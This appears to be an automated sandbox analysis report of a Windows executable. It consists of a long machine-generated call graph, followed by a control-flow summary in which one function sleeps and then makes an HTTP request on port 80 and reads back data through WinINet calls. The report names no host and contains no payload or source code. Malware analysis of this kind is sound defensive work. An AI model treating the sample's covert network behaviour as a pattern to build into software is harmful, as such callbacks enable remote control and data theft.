4b22c0 3 API calls 11577->11579 11578->11222 11579->11571 11579->11573 11579->11576 11579->11577 11579->11578 11580->11558 11582 4b6ca1 11581->11582 11590 4b69c8 shared_ptr 11581->11590 11583 4b6d63 11582->11583 11584 4b6cc4 11582->11584 11586 4c8200 RtlAllocateHeap 11583->11586 11585 4c80c0 RtlAllocateHeap 11584->11585 11587 4b6ce3 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11585->11587 11586->11587 11587->11233 11588 4c80c0 RtlAllocateHeap 11588->11590 11589 4c9280 RtlAllocateHeap 11589->11590 11590->11582 11590->11583 11590->11587 11590->11588 11590->11589 11592 4b7d96 __cftof 11591->11592 11593 4c7a00 RtlAllocateHeap 11592->11593 11602 4b7ee8 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11592->11602 11594 4b7dc7 11593->11594 11595 4b5c10 4 API calls 11594->11595 11596 4b7dd2 11595->11596 11597 4c7a00 RtlAllocateHeap 11596->11597 11598 4b7df4 11597->11598 11599 4b5c10 4 API calls 11598->11599 11601 4b7dff shared_ptr 11599->11601 11600 4b7ed3 GetNativeSystemInfo 11603 4b7ed7 11600->11603 11601->11600 11601->11602 11601->11603 11602->11232 11603->11602 11604 4b8019 11603->11604 11605 4b7f3f 11603->11605 11607 4c7a00 RtlAllocateHeap 11604->11607 11606 4c7a00 RtlAllocateHeap 11605->11606 11608 4b7f60 11606->11608 11609 4b8045 11607->11609 11611 4b5c10 4 API calls 11608->11611 11610 4b5c10 4 API calls 11609->11610 11612 4b804c 11610->11612 11613 4b7f67 11611->11613 11614 4c7a00 RtlAllocateHeap 11612->11614 11615 4c7a00 RtlAllocateHeap 11613->11615 11616 4b8064 11614->11616 11617 4b7f7f 11615->11617 11618 4b5c10 4 API calls 11616->11618 11619 4b5c10 4 API calls 11617->11619 11620 4b806b 11618->11620 11621 4b7f86 11619->11621 11622 4c7a00 RtlAllocateHeap 11620->11622 11977 4e8bbe 11621->11977 11624 4b809c 11622->11624 11625 4b5c10 4 API calls 11624->11625 11626 4b80a3 11625->11626 11627 4b5730 RtlAllocateHeap 11626->11627 11628 4b80b2 11627->11628 11629 4c7a00 RtlAllocateHeap 11628->11629 11630 4b80ed 11629->11630 11631 4b5c10 4 API calls 11630->11631 11632 4b80f4 11631->11632 11633 4c7a00 RtlAllocateHeap 11632->11633 11634 4b810c 11633->11634 11635 4b5c10 4 API calls 11634->11635 11636 4b8113 11635->11636 11637 4c7a00 RtlAllocateHeap 11636->11637 11638 4b8144 11637->11638 11639 4b5c10 4 API calls 11638->11639 11640 4b814b 11639->11640 11641 4b5730 RtlAllocateHeap 11640->11641 11642 4b815a 11641->11642 11643 4c7a00 RtlAllocateHeap 11642->11643 11644 4b8195 11643->11644 11645 4b5c10 4 API calls 11644->11645 11646 4b819c 11645->11646 11647 4c7a00 RtlAllocateHeap 11646->11647 11648 4b81b4 11647->11648 11649 4b5c10 4 API calls 11648->11649 11650 4b81bb 11649->11650 11651 4c7a00 RtlAllocateHeap 11650->11651 11652 4b81ec 11651->11652 11653 4b5c10 4 API calls 11652->11653 11654 4b81f3 11653->11654 11655 4b5730 RtlAllocateHeap 11654->11655 11656 4b8202 11655->11656 11657 4c7a00 RtlAllocateHeap 11656->11657 11658 4b823d 11657->11658 11659 4b5c10 4 API calls 11658->11659 11660 4b8244 11659->11660 11661 4c7a00 RtlAllocateHeap 11660->11661 11662 4b825c 11661->11662 11663 4b5c10 4 API calls 11662->11663 11664 4b8263 11663->11664 11665 4c7a00 RtlAllocateHeap 11664->11665 11666 4b8294 11665->11666 11667 4b5c10 4 API calls 11666->11667 11668 4b829b 11667->11668 11669 4b5730 RtlAllocateHeap 11668->11669 11669->11602 11671 4b45d4 11670->11671 11671->11671 11672 4c80c0 RtlAllocateHeap 11671->11672 11673 4b4647 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11671->11673 11672->11673 11673->11237 11675 4b83e5 __cftof 11674->11675 11676 4c7a00 RtlAllocateHeap 11675->11676 11679 4b8403 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11675->11679 11677 4b841c 11676->11677 11678 4b5c10 4 API calls 11677->11678 11680 4b8427 11678->11680 11679->11241 11681 4c7a00 RtlAllocateHeap 11680->11681 11682 4b8449 11681->11682 11683 4b5c10 4 API calls 11682->11683 11685 4b8454 shared_ptr 11683->11685 11684 4b8524 GetNativeSystemInfo 11684->11679 11685->11679 11685->11684 11689 4c7e01 11686->11689 11690 4c7e2c 11686->11690 11687 4c7f20 11688 4c9270 RtlAllocateHeap 11687->11688 11698 4c7e91 shared_ptr 11688->11698 11689->11305 11690->11687 11691 4c7f1b 11690->11691 11692 4c7ea7 11690->11692 11693 4c7e80 11690->11693 11694 4b2480 RtlAllocateHeap 11691->11694 11697 4cd3e2 RtlAllocateHeap 11692->11697 11692->11698 11693->11691 11695 4c7e8b 11693->11695 11694->11687 11696 4cd3e2 RtlAllocateHeap 11695->11696 11696->11698 11697->11698 11698->11305 11700 4c7864 shared_ptr 11699->11700 11702 4c777b 11699->11702 11700->11308 11701 4c77fb 11701->11700 11703 4c9270 RtlAllocateHeap 11701->11703 11702->11700 11702->11701 11706 4c7811 11702->11706 11708 4c77ea 11702->11708 11704 4c78f6 11703->11704 11705 4b2480 RtlAllocateHeap 11704->11705 11707 4c78fb 11705->11707 11706->11701 11710 4cd3e2 RtlAllocateHeap 11706->11710 11708->11704 11709 4cd3e2 RtlAllocateHeap 11708->11709 11709->11701 11710->11701 11712 4c8dc9 11711->11712 11713 4c8cc3 11711->11713 11714 4c9270 RtlAllocateHeap 11712->11714 11717 4c8d2f 11713->11717 11718 4c8d05 11713->11718 11715 4c8dce 11714->11715 11716 4b2480 RtlAllocateHeap 11715->11716 11722 4c8d16 shared_ptr 11716->11722 11720 4cd3e2 RtlAllocateHeap 11717->11720 11717->11722 11718->11715 11719 4c8d10 11718->11719 11721 4cd3e2 RtlAllocateHeap 11719->11721 11720->11722 11721->11722 11722->11308 11724 4c8339 11723->11724 11725 4c834d 11724->11725 11980 4c8f40 11724->11980 11725->11406 11728 4c8248 11727->11728 11729 4c8292 11727->11729 11728->11729 11730 4c8251 11728->11730 11732 4c82a1 11729->11732 11733 4c8f40 RtlAllocateHeap 11729->11733 11731 4c9280 RtlAllocateHeap 11730->11731 11734 4c825a 11731->11734 11732->11408 11733->11732 11734->11408 11736 4c80c0 RtlAllocateHeap 11735->11736 11737 4b49f3 11736->11737 11738 4c80c0 RtlAllocateHeap 11737->11738 11739 4b4a0c 11738->11739 11998 4b4690 11739->11998 11741 4b4a99 shared_ptr 11741->11463 11768 4c7f80 11742->11768 11744 4b596b 11745 4b59e0 11744->11745 11746 4c7f80 RtlAllocateHeap 11745->11746 11759 4b5a45 11746->11759 11747 4c7a00 RtlAllocateHeap 11747->11759 11748 4b5bdd __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11748->11478 11749 4b5c09 11750 4c8200 RtlAllocateHeap 11749->11750 11751 4b5c0e 11750->11751 11753 4b5940 RtlAllocateHeap 11751->11753 11752 4c80c0 RtlAllocateHeap 11752->11759 11755 4b5c54 11753->11755 11756 4b59e0 4 API calls 11755->11756 11757 4b5c6a 11756->11757 11758 4b4b30 4 API calls 11757->11758 11760 4b5c7b shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11758->11760 11759->11747 11759->11748 11759->11749 11759->11752 11793 4b5730 11759->11793 11760->11478 11762 4b4dc2 11761->11762 11766 4b4b92 11761->11766 11762->11480 11764 4b4ce5 11764->11762 11765 4c8ca0 RtlAllocateHeap 11764->11765 11765->11764 11766->11764 11767 4c8ca0 RtlAllocateHeap 11766->11767 11799 4e6da6 11766->11799 11767->11766 11770 4c7fc7 11768->11770 11772 4c7f9e __cftof 11768->11772 11773 4c803e 11770->11773 11774 4c801b 11770->11774 11780 4c802c __cftof 11770->11780 11771 4c80b8 11775 4b2480 RtlAllocateHeap 11771->11775 11772->11744 11778 4cd3e2 RtlAllocateHeap 11773->11778 11773->11780 11774->11771 11777 4cd3e2 RtlAllocateHeap 11774->11777 11776 4c80bd 11775->11776 11777->11780 11778->11780 11779 4c8095 shared_ptr 11779->11744 11780->11779 11781 4c9270 11780->11781 11784 4cc1b9 11781->11784 11787 4cc123 11784->11787 11786 4cc1ca std::_Throw_future_error 11790 4b22e0 11787->11790 11789 4cc135 11789->11786 11791 4e38af ___std_exception_copy RtlAllocateHeap 11790->11791 11792 4b2317 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11791->11792 11792->11789 11797 4b5860 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11793->11797 11798 4b5799 shared_ptr 11793->11798 11794 4b592a 11796 4c8200 RtlAllocateHeap 11794->11796 11795 4c80c0 RtlAllocateHeap 11795->11798 11796->11797 11797->11759 11798->11794 11798->11795 11798->11797 11800 4e6db4 11799->11800 11801 4e6dc2 __fassign 11799->11801 11804 4e6d19 11800->11804 11801->11766 11805 4e690a __cftof 3 API calls 11804->11805 11806 4e6d2c 11805->11806 11809 4e6d52 11806->11809 11808 4e6d3d 11808->11766 11810 4e6d8f 11809->11810 11811 4e6d5f 11809->11811 11820 4eb67d 11810->11820 11812 4e6d6e __fassign 11811->11812 11815 4eb6a1 11811->11815 11812->11808 11816 4e690a __cftof 3 API calls 11815->11816 11817 4eb6be 11816->11817 11819 4eb6ce __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11817->11819 11824 4ef1bf 11817->11824 11819->11812 11821 4eb688 11820->11821 11822 4eb5fb __cftof 2 API calls 11821->11822 11823 4eb698 11822->11823 11823->11812 11825 4e690a __cftof 3 API calls 11824->11825 11826 4ef1df __fassign 11825->11826 11827 4eb04b __cftof RtlAllocateHeap 11826->11827 11828 4ef232 __cftof __fassign __freea __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11826->11828 11827->11828 11828->11819 11830 4e887a 11829->11830 11831 4e690a __cftof 3 API calls 11830->11831 11834 4e888f __cftof __dosmaperr 11830->11834 11833 4e88bf 11831->11833 11832 4e6d52 3 API calls 11832->11833 11833->11832 11833->11834 11834->11532 11836 4c9294 11835->11836 11839 4c92a5 11836->11839 11840 4c94e0 11836->11840 11838 4c932b 11838->11550 11839->11550 11841 4c9619 11840->11841 11842 4c950b 11840->11842 11843 4c9270 RtlAllocateHeap 11841->11843 11846 4c9579 11842->11846 11847 4c9552 11842->11847 11844 4c961e 11843->11844 11845 4b2480 RtlAllocateHeap 11844->11845 11851 4c9563 shared_ptr 11845->11851 11850 4cd3e2 RtlAllocateHeap 11846->11850 11846->11851 11847->11844 11848 4c955d 11847->11848 11849 4cd3e2 RtlAllocateHeap 11848->11849 11849->11851 11850->11851 11851->11838 11853 4b22e0 std::future_error::future_error RtlAllocateHeap 11852->11853 11854 4cc16f 11853->11854 11854->11556 11858 4b2280 11855->11858 11859 4b2296 11858->11859 11862 4e87f8 11859->11862 11865 4e7609 11862->11865 11864 4b22a4 11864->11565 11866 4e7649 11865->11866 11870 4e7631 __cftof __dosmaperr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11865->11870 11867 4e690a __cftof 3 API calls 11866->11867 11866->11870 11868 4e7661 11867->11868 11871 4e7bc4 11868->11871 11870->11864 11872 4e7bd5 11871->11872 11873 4e7be4 __cftof __dosmaperr 11872->11873 11878 4e8168 11872->11878 11883 4e7dc2 11872->11883 11888 4e7de8 11872->11888 11909 4e7f36 11872->11909 11873->11870 11879 4e8178 11878->11879 11880 4e8171 11878->11880 11879->11872 11928 4e7b50 11880->11928 11882 4e8177 11882->11872 11884 4e7dcb 11883->11884 11885 4e7dd2 11883->11885 11886 4e7b50 3 API calls 11884->11886 11885->11872 11887 4e7dd1 11886->11887 11887->11872 11889 4e7def 11888->11889 11893 4e7e09 __cftof __dosmaperr 11888->11893 11890 4e7fbb 11889->11890 11889->11893 11894 4e7f4f 11889->11894 11891 4e7fc2 11890->11891 11892 4e8001 11890->11892 11899 4e7f92 11890->11899 11896 4e7f69 11891->11896 11897 4e7fc7 11891->11897 11950 4e8604 11892->11950 11893->11872 11898 4e7f5b 11894->11898 11894->11899 11907 4e7f77 11896->11907 11908 4e7f8b 11896->11908 11944 4e8241 11896->11944 11897->11899 11902 4e7fcc 11897->11902 11898->11896 11901 4e7fa2 11898->11901 11898->11907 11899->11907 11899->11908 11940 4e8420 11899->11940 11901->11908 11932 4e8390 11901->11932 11902->11907 11902->11908 11936 4e85e5 11902->11936 11907->11908 11953 4e86ea 11907->11953 11908->11872 11910 4e7f4f 11909->11910 11911 4e7fbb 11909->11911 11919 4e7f92 11910->11919 11921 4e7f5b 11910->11921 11912 4e7fc2 11911->11912 11913 4e8001 11911->11913 11911->11919 11914 4e7f69 11912->11914 11915 4e7fc7 11912->11915 11916 4e8604 RtlAllocateHeap 11913->11916 11917 4e8241 3 API calls 11914->11917 11926 4e7f77 11914->11926 11927 4e7f8b 11914->11927 11918 4e7fcc 11915->11918 11915->11919 11916->11926 11917->11926 11924 4e85e5 RtlAllocateHeap 11918->11924 11918->11926 11918->11927 11922 4e8420 RtlAllocateHeap 11919->11922 11919->11926 11919->11927 11920 4e7fa2 11923 4e8390 3 API calls 11920->11923 11920->11927 11921->11914 11921->11920 11921->11926 11922->11926 11923->11926 11924->11926 11925 4e86ea 3 API calls 11925->11927 11926->11925 11926->11927 11927->11872 11929 4e7b62 __dosmaperr 11928->11929 11930 4e8ab6 3 API calls 11929->11930 11931 4e7b85 __dosmaperr 11930->11931 11931->11882 11934 4e83ab 11932->11934 11933 4e83dd 11933->11907 11934->11933 11957 4ec88e 11934->11957 11937 4e85f1 11936->11937 11938 4e8420 RtlAllocateHeap 11937->11938 11939 4e8603 11938->11939 11939->11907 11941 4e8433 11940->11941 11943 4e844e __cftof __dosmaperr 11941->11943 11960 4e779f 11941->11960 11943->11907 11945 4e825a 11944->11945 11946 4e779f RtlAllocateHeap 11945->11946 11947 4e8297 11946->11947 11964 4ed3c8 11947->11964 11949 4e830d 11949->11907 11949->11949 11951 4e8420 RtlAllocateHeap 11950->11951 11952 4e861b 11951->11952 11952->11907 11954 4e875d __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11953->11954 11956 4e8707 11953->11956 11954->11908 11955 4ec88e __cftof 3 API calls 11955->11956 11956->11954 11956->11955 11958 4ec733 __cftof GetPEB GetPEB RtlAllocateHeap 11957->11958 11959 4ec8a6 11958->11959 11959->11933 11961 4e77c3 11960->11961 11962 4e77b4 __dosmaperr ___free_lconv_mon 11960->11962 11961->11962 11963 4eb04b __cftof RtlAllocateHeap 11961->11963 11962->11943 11963->11962 11965 4ed3d8 __cftof __dosmaperr 11964->11965 11966 4ed3ee 11964->11966 11965->11949 11966->11965 11967 4ed485 11966->11967 11968 4ed48a 11966->11968 11970 4ed4ae 11967->11970 11971 4ed4e4 11967->11971 11969 4ecbdf GetPEB GetPEB RtlAllocateHeap 11968->11969 11969->11965 11973 4ed4cc 11970->11973 11974 4ed4b3 11970->11974 11972 4ecef8 GetPEB GetPEB RtlAllocateHeap 11971->11972 11972->11965 11976 4ed0e2 GetPEB GetPEB RtlAllocateHeap 11973->11976 11975 4ed23e GetPEB GetPEB RtlAllocateHeap 11974->11975 11975->11965 11976->11965 11978 4e8868 3 API calls 11977->11978 11979 4e8bdc 11978->11979 11979->11602 11981 4c908e 11980->11981 11982 4c8f6b 11980->11982 11983 4c9270 RtlAllocateHeap 11981->11983 11986 4c8fdc 11982->11986 11987 4c8fb2 11982->11987 11984 4c9093 11983->11984 11985 4b2480 RtlAllocateHeap 11984->11985 11991 4c8fc3 11985->11991 11990 4cd3e2 RtlAllocateHeap 11986->11990 11986->11991 11987->11984 11988 4c8fbd 11987->11988 11989 4cd3e2 RtlAllocateHeap 11988->11989 11989->11991 11990->11991 11992 4c90b8 11991->11992 11994 4c904c shared_ptr 11991->11994 11995 4b2480 std::_Throw_future_error 11991->11995 11993 4cd3e2 RtlAllocateHeap 11992->11993 11993->11994 11994->11725 11996 4e38af ___std_exception_copy RtlAllocateHeap 11995->11996 11997 4b24c3 11996->11997 11997->11725 11999 4c80c0 RtlAllocateHeap 11998->11999 12006 4b4707 shared_ptr 11999->12006 12000 4b4976 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12000->11741 12001 4c80c0 RtlAllocateHeap 12005 4b4846 shared_ptr 12001->12005 12002 4c80c0 RtlAllocateHeap 12002->12006 12003 4c8f40 RtlAllocateHeap 12003->12005 12004 4c8f40 RtlAllocateHeap 12004->12006 12005->12000 12005->12001 12005->12003 12007 4b4994 12005->12007 12006->12002 12006->12004 12006->12005 12006->12007 12008 4c80c0 RtlAllocateHeap 12007->12008 12009 4b49f3 12008->12009 12010 4c80c0 RtlAllocateHeap 12009->12010 12011 4b4a0c 12010->12011 12012 4b4690 RtlAllocateHeap 12011->12012 12013 4b4a99 shared_ptr 12012->12013 12013->11741 12032 4ca210 12033 4ca290 12032->12033 12045 4c71d0 12033->12045 12035 4ca2cc 12038 4ca330 12035->12038 12053 4c7d50 12035->12053 12065 4b3840 12038->12065 12039 4ca39e shared_ptr 12040 4cd3e2 RtlAllocateHeap 12039->12040 12042 4ca4be shared_ptr 12039->12042 12041 4ca45e 12040->12041 12073 4b3ee0 12041->12073 12044 4ca4a6 12046 4c7211 12045->12046 12047 4cd3e2 RtlAllocateHeap 12046->12047 12048 4c7238 12047->12048 12049 4cd3e2 RtlAllocateHeap 12048->12049 12050 4c7446 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12048->12050 12051 4c73bb __cftof 12049->12051 12050->12035 12079 4b2ec0 12051->12079 12054 4c7dcb 12053->12054 12055 4c7d62 12053->12055 12056 4b2480 RtlAllocateHeap 12054->12056 12057 4c7d9c 12055->12057 12058 4c7d6d 12055->12058 12059 4c7d7a 12056->12059 12061 4c7db9 12057->12061 12063 4cd3e2 RtlAllocateHeap 12057->12063 12058->12054 12060 4c7d74 12058->12060 12059->12038 12062 4cd3e2 RtlAllocateHeap 12060->12062 12061->12038 12062->12059 12064 4c7da6 12063->12064 12064->12038 12066 4b38f6 12065->12066 12068 4b385f 12065->12068 12066->12039 12067 4b391b 12185 4c91e0 12067->12185 12068->12066 12068->12067 12070 4b38cd shared_ptr 12068->12070 12072 4c7d50 RtlAllocateHeap 12070->12072 12072->12066 12074 4b3f48 12073->12074 12075 4b3f1e 12073->12075 12076 4b3f58 12074->12076 12188 4b2c00 12074->12188 12075->12044 12076->12044 12080 4b2f7e GetCurrentThreadId 12079->12080 12081 4b2f06 12079->12081 12082 4b2fef 12080->12082 12083 4b2f94 12080->12083 12119 4cc6ac 12081->12119 12082->12050 12083->12082 12090 4cc6ac GetSystemTimePreciseAsFileTime 12083->12090 12086 4b301e 12122 4cc26a 12086->12122 12087 4b2f1d 12091 4cd3e2 RtlAllocateHeap 12087->12091 12094 4b2f30 __Mtx_unlock 12087->12094 12089 4b3024 12092 4cc26a 4 API calls 12089->12092 12093 4b2fb9 12090->12093 12091->12094 12092->12093 12096 4cc26a 4 API calls 12093->12096 12097 4b2fc0 __Mtx_unlock 12093->12097 12094->12089 12095 4b2f6f 12094->12095 12095->12080 12095->12082 12096->12097 12098 4cc26a 4 API calls 12097->12098 12099 4b2fd8 __Cnd_broadcast 12097->12099 12098->12099 12099->12082 12100 4cc26a 4 API calls 12099->12100 12101 4b303c 12100->12101 12102 4cc6ac GetSystemTimePreciseAsFileTime 12101->12102 12110 4b3080 shared_ptr __Mtx_unlock 12102->12110 12103 4b31c5 12104 4cc26a 4 API calls 12103->12104 12105 4b31cb 12104->12105 12106 4cc26a 4 API calls 12105->12106 12107 4b31d1 12106->12107 12108 4cc26a 4 API calls 12107->12108 12111 4b3193 __Mtx_unlock 12108->12111 12109 4b31a7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12109->12050 12110->12103 12110->12105 12110->12109 12114 4b3132 GetCurrentThreadId 12110->12114 12111->12109 12112 4cc26a 4 API calls 12111->12112 12113 4b31dd 12112->12113 12114->12109 12115 4b313b 12114->12115 12115->12109 12116 4cc6ac GetSystemTimePreciseAsFileTime 12115->12116 12117 4b315f 12116->12117 12117->12103 12117->12107 12117->12111 12126 4cbd4c 12117->12126 12129 4cc452 12119->12129 12121 4b2f12 12121->12086 12121->12087 12123 4cc292 12122->12123 12124 4cc274 12122->12124 12123->12123 12124->12123 12146 4cc297 12124->12146 12179 4cbb72 12126->12179 12128 4cbd5c 12128->12117 12130 4cc4a8 12129->12130 12132 4cc47a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12129->12132 12130->12132 12135 4ccf6b 12130->12135 12132->12121 12133 4cc4fd __Xtime_diff_to_millis2 12133->12132 12134 4ccf6b _xtime_get GetSystemTimePreciseAsFileTime 12133->12134 12134->12133 12136 4ccf87 __aulldvrm 12135->12136 12137 4ccf7a 12135->12137 12136->12133 12137->12136 12139 4ccf44 12137->12139 12142 4ccbea 12139->12142 12143 4ccbfb GetSystemTimePreciseAsFileTime 12142->12143 12144 4ccc07 12142->12144 12143->12144 12144->12136 12151 4b2ae0 12146->12151 12150 4cc2bf std::_Throw_future_error 12150->12124 12163 4cbedf 12151->12163 12153 4b2aff 12157 4cc1ff 12153->12157 12154 4e8bec __cftof 2 API calls 12155 4e6cf6 12154->12155 12156 4b2af4 __cftof 12156->12153 12156->12154 12158 4cc20b __EH_prolog3_GS 12157->12158 12159 4c80c0 RtlAllocateHeap 12158->12159 12160 4cc23d 12159->12160 12170 4b26b0 12160->12170 12162 4cc252 12162->12150 12166 4ccc31 12163->12166 12167 4ccc3f InitOnceExecuteOnce 12166->12167 12169 4cbef2 12166->12169 12167->12169 12169->12156 12171 4c7a00 RtlAllocateHeap 12170->12171 12172 4b2702 12171->12172 12173 4b2725 12172->12173 12174 4c8f40 RtlAllocateHeap 12172->12174 12175 4c8f40 RtlAllocateHeap 12173->12175 12177 4b278e shared_ptr 12173->12177 12174->12173 12175->12177 12176 4e38af ___std_exception_copy RtlAllocateHeap 12178 4b284b shared_ptr ___std_exception_destroy __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12176->12178 12177->12176 12177->12178 12178->12162 12180 4cbb9c 12179->12180 12181 4ccf6b _xtime_get GetSystemTimePreciseAsFileTime 12180->12181 12183 4cbba4 __Xtime_diff_to_millis2 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12180->12183 12182 4cbbcf __Xtime_diff_to_millis2 12181->12182 12182->12183 12184 4ccf6b _xtime_get GetSystemTimePreciseAsFileTime 12182->12184 12183->12128 12184->12183 12186 4cc1b9 RtlAllocateHeap 12185->12186 12187 4c91ea 12186->12187 12189 4cd3e2 RtlAllocateHeap 12188->12189 12190 4b2c0e 12189->12190 12198 4cb847 12190->12198 12192 4b2c42 12193 4b2c49 12192->12193 12204 4b2c80 12192->12204 12193->12044 12195 4b2c58 12207 4b2560 12195->12207 12197 4b2c65 std::_Throw_future_error 12199 4cb854 12198->12199 12203 4cb873 Concurrency::details::_Reschedule_chore 12198->12203 12210 4ccb77 12199->12210 12201 4cb864 12201->12203 12212 4cb81e 12201->12212 12203->12192 12218 4cb7fb 12204->12218 12206 4b2cb2 shared_ptr 12206->12195 12208 4e38af ___std_exception_copy RtlAllocateHeap 12207->12208 12209 4b2597 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12208->12209 12209->12197 12211 4ccb92 CreateThreadpoolWork 12210->12211 12211->12201 12213 4cb827 Concurrency::details::_Reschedule_chore 12212->12213 12216 4ccdcc 12213->12216 12215 4cb841 12215->12203 12217 4ccde1 TpPostWork 12216->12217 12217->12215 12219 4cb807 12218->12219 12220 4cb817 12218->12220 12219->12220 12222 4cca78 12219->12222 12220->12206 12223 4cca8d TpReleaseWork 12222->12223 12223->12220 12305 4c87d0 12306 4cd3e2 RtlAllocateHeap 12305->12306 12307 4c882a __cftof 12306->12307 12315 4c9bb0 12307->12315 12309 4c8854 12313 4c886c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12309->12313 12319 4b43f0 12309->12319 12314 4c88df 12316 4c9be5 12315->12316 12328 4b2ce0 12316->12328 12318 4c9c16 12318->12309 12320 4cbedf InitOnceExecuteOnce 12319->12320 12321 4b440a 12320->12321 12322 4b4411 12321->12322 12323 4e6cbb 2 API calls 12321->12323 12325 4cbe50 12322->12325 12324 4b4424 12323->12324 12372 4cbd8b 12325->12372 12327 4cbe66 std::_Throw_future_error 12327->12314 12329 4b2d1d 12328->12329 12330 4cbedf InitOnceExecuteOnce 12329->12330 12331 4b2d46 12330->12331 12332 4b2d51 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12331->12332 12333 4b2d88 12331->12333 12337 4cbef7 12331->12337 12332->12318 12346 4b2440 12333->12346 12338 4cbf03 12337->12338 12349 4b2900 12338->12349 12340 4cbf23 std::_Throw_future_error 12341 4cbf6a 12340->12341 12342 4cbf73 12340->12342 12357 4cbe7f 12341->12357 12343 4b2ae0 3 API calls 12342->12343 12345 4cbf6f 12343->12345 12345->12333 12367 4cb5d6 12346->12367 12348 4b2472 12350 4c80c0 RtlAllocateHeap 12349->12350 12351 4b294f 12350->12351 12352 4b26b0 RtlAllocateHeap 12351->12352 12354 4b2967 12352->12354 12353 4b298d shared_ptr 12353->12340 12354->12353 12355 4e38af ___std_exception_copy RtlAllocateHeap 12354->12355 12356 4b29e4 12355->12356 12356->12340 12358 4ccc31 InitOnceExecuteOnce 12357->12358 12359 4cbe97 12358->12359 12360 4cbe9e 12359->12360 12363 4e6cbb 12359->12363 12360->12345 12366 4e6cc7 __cftof 12363->12366 12364 4e8bec __cftof 2 API calls 12365 4e6cf6 12364->12365 12366->12364 12368 4cb5f1 std::_Throw_future_error 12367->12368 12369 4e8bec __cftof 2 API calls 12368->12369 12371 4cb658 __cftof __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12368->12371 12370 4cb69f 12369->12370 12371->12348 12373 4b22e0 std::future_error::future_error RtlAllocateHeap 12372->12373 12374 4cbd9f 12373->12374 12374->12327

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1051 4bbe30-4bbe7c 1052 4bbe82-4bbe86 1051->1052 1053 4bc281-4bc2a6 call 4c80c0 1051->1053 1052->1053 1055 4bbe8c-4bbe90 1052->1055 1058 4bc2a8-4bc2b4 1053->1058 1059 4bc2d4-4bc2ec 1053->1059 1055->1053 1057 4bbe96-4bbf2a Sleep InternetOpenW InternetConnectA call 4c7a00 call 4b5c10 1055->1057 1086 4bbf2e-4bbf4a HttpOpenRequestA 1057->1086 1087 4bbf2c 1057->1087 1061 4bc2ca-4bc2d1 call 4cd663 1058->1061 1062 4bc2b6-4bc2c4 1058->1062 1063 4bc238-4bc250 1059->1063 1064 4bc2f2-4bc2fe 1059->1064 1061->1059 1062->1061 1066 4bc34f-4bc354 call 4e6c6a 1062->1066 1070 4bc323-4bc33f call 4ccff1 1063->1070 1071 4bc256-4bc262 1063->1071 1068 4bc22e-4bc235 call 4cd663 1064->1068 1069 4bc304-4bc312 1064->1069 1068->1063 1069->1066 1076 4bc314 1069->1076 1077 4bc319-4bc320 call 4cd663 1071->1077 1078 4bc268-4bc276 1071->1078 1076->1068 1077->1070 1078->1066 1085 4bc27c 1078->1085 1085->1077 1088 4bbf7b-4bbfea call 4c7a00 call 4b5c10 call 4c7a00 call 4b5c10 1086->1088 1089 4bbf4c-4bbf5b 1086->1089 1087->1086 1103 4bbfee-4bc004 HttpSendRequestA 1088->1103 1104 4bbfec 1088->1104 1091 4bbf5d-4bbf6b 1089->1091 1092 4bbf71-4bbf78 call 4cd663 1089->1092 1091->1092 1092->1088 1105 4bc006-4bc015 1103->1105 1106 4bc035-4bc05d 1103->1106 1104->1103 1107 4bc02b-4bc032 call 4cd663 1105->1107 1108 4bc017-4bc025 1105->1108 1109 4bc05f-4bc06e 1106->1109 1110 4bc08e-4bc0af InternetReadFile 1106->1110 1107->1106 1108->1107 1112 4bc070-4bc07e 1109->1112 1113 4bc084-4bc08b call 4cd663 1109->1113 1114 4bc0b5 1110->1114 1112->1113 1113->1110 1117 4bc0c0-4bc170 call 4e4250 1114->1117
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • Sleep.KERNEL32(000005DC), ref: 004BBEB8
                                                                                                                                                                                                                                                • InternetOpenW.WININET(00508DC8,00000000,00000000,00000000,00000000), ref: 004BBEC8
                                                                                                                                                                                                                                                • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 004BBEEB
                                                                                                                                                                                                                                                • HttpOpenRequestA.WININET(?,00000000), ref: 004BBF36
                                                                                                                                                                                                                                                • HttpSendRequestA.WININET(?,00000000), ref: 004BBFF6
                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,?,000003FF,?), ref: 004BC0A8
                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 004BC187
                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 004BC18F
                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 004BC197
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
